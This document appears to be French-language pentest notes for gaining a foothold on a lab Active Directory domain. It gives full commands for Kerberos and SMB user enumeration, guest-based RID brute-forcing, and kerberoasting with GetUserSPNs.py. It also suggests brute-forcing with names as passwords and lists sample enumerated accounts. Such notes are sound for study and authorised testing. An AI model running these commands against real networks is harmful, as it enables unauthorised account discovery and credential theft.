FootHold

Scan Initial

Dans de nombreux cas, les machines Windows ne répondent pas aux requêtes ping.
Un scan NMAP normal considèrera que l'hôte est down dans ce cas. Pour corriger ce problème, il suffit d'ajouter le flag -Pn.

Kerberos

Si Kerberos est exposé (port 88 & port 464), nous pouvons essayer de récupérer les utilisateurs existants avec NMAP :

nmap -p88,464 --script krb5-enum-users --script-args krb5-enum-users.realm=SOUPDECODE.LOCAL 10.113.156.79

Cela nous permet d'obtenir les principaux, et si par chance nous avons accès à un utilisateur, même guest sans mot de passe, nous pouvons utiliser nxc pour obtenir le reste des utilisateurs :

nxc smb dc01.soupedecode.local -u 'guest' -p '' --rid

[!NOTE] Pour attaquer par force brute les utilisateurs trouvés, nous utilisons Kerbrute. Par ailleurs, il est bon de noter que les utilisateurs utilisent souvent leur propre nom comme mot de passe. Cela permet de constituer une bonne base de logins possibles pour l'attaque.

Une fois la liste des utilisateurs obtenus, il est même possible de passer directement à une attaque type kerberoast, même sans avoir d'autre utilisateur que le guest :

GetUserSPNs.py -dc-ip 10.113.156.79 soupedecode.local/guest -usersfile cleaned -outputfile spns

avec le fichier cleaned contenant les noms d'utilisateurs / machines / etc :

[...]
SOUPEDECODE\ygrace245
SOUPEDECODE\yisaac591
SOUPEDECODE\PC-83$
SOUPEDECODE\ApplicationServer$
SOUPEDECODE\rtom206
SOUPEDECODE\ddiana625
SOUPEDECODE\llila521
[...]